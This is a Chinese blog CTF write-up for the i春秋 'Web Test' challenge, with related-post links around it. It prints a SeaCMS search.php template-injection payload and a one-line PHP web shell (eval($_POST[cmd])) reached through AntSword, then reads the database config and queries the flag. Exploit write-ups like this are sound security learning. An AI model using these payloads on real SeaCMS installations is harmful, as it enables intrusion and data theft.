i春秋CTF训练 Web Test

最新推荐文章于 2024-07-30 13:39:14 发布

椰奶冻不安全

最新推荐文章于 2024-07-30 13:39:14 发布

阅读量1.6k

点赞数

分类专栏： CTF 文章标签： sql

来自椰奶冻不安全的博客，复制完可要记得我吖

本文链接：https://blog.csdn.net/qq_40654505/article/details/107142533

版权

CTF 专栏收录该内容

14 篇文章 1 订阅

订阅专栏

Web Test

题目内容：善于查资料，你就可以拿一血了。

题目链接请在i春秋申请

根据提示直接在搜索引擎上查询海洋cms漏洞，发现曾经有过前台getshell，用poc试一下

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();

在这里插入图片描述

执行成功，可以直接上传一句话，使用蚁剑连接

url地址：http://eci-2zeinawvsdkxjfr63efa.cloudeci.ichunqiu.com/search.php?searchtype=5&tid=&area=eval($_POST[cmd])
连接密码：cmd

找了好久终于找到数据库配置文件，/var/www/html/data/common.inc.php

在这里插入图片描述

鼠标右击这条shell，选择数据操作，添加上面的数据库用户名和密码连接数据库

在这里插入图片描述

然后在seacms库里发现flag，执行sql命令得到flag

SELECT * FROM `flag_140ad2e0d8cb` ORDER BY 1 DESC LIMIT 0,20;

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

椰奶冻不安全

关注关注

0
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

[网络安全自学篇] 八十.WHUCTF之WEB类解题思路WP（代码审计、文件包含、过滤绕过、SQL注入）

杨秀璋的专栏

05-29

1万+

这是作者网络安全自学教程系列，主要是关于安全工具和实践操作的在线笔记，特分享出来与博友们学习，希望您喜欢，一起进步。前文分享了Windows PE病毒，包括PE病毒原理、分类及感染方式详解，并通过案例进行介绍。这篇文章将介绍WHUCTF部分题目，第一次参加CTF，还是能学到很多东西。下面分享四个我完成的WEB类型题目的解题过程，希望对您有所帮助。本来感觉能做出6道题目，但有两道题卡在某个点，后面几天忙于其他事情，就没再参加。人生路上，要珍惜好每一天与家人陪伴的日子。感谢武汉大学，感谢网安学院，感谢这些大佬

CTF入门_常规测试

m0_46203901的博客

09-07

833

burp爆破、Base64解码，以及越权漏洞

参与评论您还未登录，请先登录后发表或查看评论

This is a Test Page.

weixin_30823683的博客

12-06

369

this is a test page. 转载于:https://www.cnblogs.com/dqsweet/archive/2011/12/06/2278117.html

WP Statistics SQL注入漏洞（CVE-2022-4230）

最新发布

zneVue

07-30

467

WP Statistics WordPress 插件13.2.9之前的版本不会转义参数，这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下，具有管理选项功能 (admin+) 的用户可以使用受影响的功能，但是该插件有一个设置允许低权限用户也可以访问它。

i春秋CTF训练 Web 破译

椰奶冻不安全的博客

07-04

1133

Web 破译题目内容：破译下面的密文： TW5650Y - 0TS UZ50S S0V LZW UZ50WKW 9505KL4G 1X WVMUSL510 S001M0UWV 910VSG S0 WFLW0K510 1X LZW54 WF5KL50Y 2S4L0W4KZ52 L1 50U14214SLW X5L0WKK S0V TSK7WLTS88 VWNW8129W0L 50 W8W9W0LS4G, 95VV8W S0V Z5YZ KUZ118K SU41KK UZ50S.LZW S001M0UW9W

ctf学习（web题二）

weixin_30609287的博客

06-25

205

web 下面是做bugku上一些web的总结内容链接转载于:https://www.cnblogs.com/zwshi/p/10181478.html

CTF之Web训练后篇2

gl620321的博客

05-25

282

这一篇是我接上一篇的内容从“十八罗汉”的第8个开始 8.代码审计

i春秋 “百度杯”CTF比赛十月场 Backdoor

include_heqile的博客

09-20

2917

https://www.ichunqiu.com/battalion?t=1&amp;amp;amp;amp;amp;r=0 这道题应该是我目前遇到的最有难度的一道题了，不过解题过程很有意思首先还是进入题目链接，根据题目提示去查看网站目录下的敏感文件，我尝试了flag.php，但并未得到有价值的提示，然后我们再尝试一下敏感目录，当我在Challenges下输入.git的时候，出现了403 Forbidden错误，说明网站中存在...

“百度杯”CTF比赛十月场--fuzzing

Oavinci的博客

05-22

864

打开页面显示 there is nothing 查看header发现hint:ip,Large internal network 利用X-Forwarded-For伪造IP，尝试了几个常用的IP X-Forwarded-For:10.0.0.1时返回./m4nage.php 将请求包中test.php修改为./m4nage.php，依旧伪造IP得到：右键修改请求方式为POST key=1 得到：md5(key)==="1b4167610ba3f2ac426a68488dbd89..

2023年LitCTF web组wp

m0_74160536的博客

05-17

1237

1、导弹迷踪2、1zjs3、php是世界上最好的语言！！4、Ping5、我Flag呢？7、作业管理系统8、Vim yyds10、这是什么？SQL！注一下！11、Flag点击就送！12、就当无事发生13、彩蛋。

"360春秋杯"线上赛 web Writeup

Bendawang's Blog

04-21

3694

“360春秋杯”线上赛 web Writeup

“百度杯”CTF比赛九月场--Web--Test--Seacms海洋漏洞

残阳泼茶香的博客

04-30

1966

Web题目名称：Test 题目内容：善于查资料，你就可以拿一血了。给了我们一个链接打开就是海洋cms的模板，通过查百度发现海洋的一个search.php漏洞 Seacms漏洞分析利用复现 By Assassin ichunqiu 通过这两个复现漏洞（注意这里 get post 都可以） http://53290ec71e554551a257d1a5ce00ab1...

Seacms漏洞

Grey的博客

07-10

5087

海洋CMS6.45前台getshell漏洞复现结果：http://127.0.0.1/CMS/seacms_v6.4/upload/search.phppost：searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}1.漏洞的触发点是在search.php 中的echoSearchPage()函数可以触发漏洞。常规的分析都是先找...

代码审计之seacms v6.54 前台Getshell 复现分析

weixin_30872867的博客

06-30

587

1.环境： php5.5.38+apache+seacms v6.54 上一篇文章针对seacms v6.45 进行了分析，官方给出针对修复前台geishell提供的方法为增加： $order = ($order == "commend" || $order == "time" || $order == "hit") ? $order : ""; 并且在v6.54中增加了对传...

php通过http请求发送数组

weixin_34319640的博客

10-22

741

最近开始学习php审计，刚好赶上研究seacms，就发现了payload处一个奇怪的点searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yu...

i春秋 WEB test

A_dmin的博客

06-11

490

i春秋 WEB test 一天一道CTF题目，能多不能少打开网页发现是一个海洋cms搭建的平台，然后根据提示：十有八九是查找海洋cms的漏洞，那就直接百度吧！！找到以下几个：海洋CMS V6.28 命令执行 0DAY Seacms v6.45 漏洞复现海洋cms v6.53 v6.54版本漏洞复现要么是命令执行，要么是getshell 先测试命令执行： searchtype=5&am...

“百度杯”CTF比赛九月场 SQLi 解题思路

****的博客

10-15

1153

题目简介题目名称：SQLi 题目内容：后台有获取flag的线索解题思路打开地址使用burp抓包发现“l0gin.php?id=1”。打开“l0gin.php?id=1”地址使用1’ and ‘1’=‘1（成功）和1’ and ‘1’='2（不成功），说明此处存在sql注入。测试中发现后台过滤了逗号，在这里使用from for代替逗号。开始注入猜测数据库名称猜测数据库名...

“百度杯”CTF比赛九月场------123

大方子

08-07

1775

==================================== 个人收获： 1.时常留意备份文件 2.文件读取漏洞 3.疑问最后一步的flag，如果加了.php双写无法绕过，只能是不加后缀的flaflagg才能绕过 ==================================== 题目界面：右键查看源码信息出现试了下密码为zhan...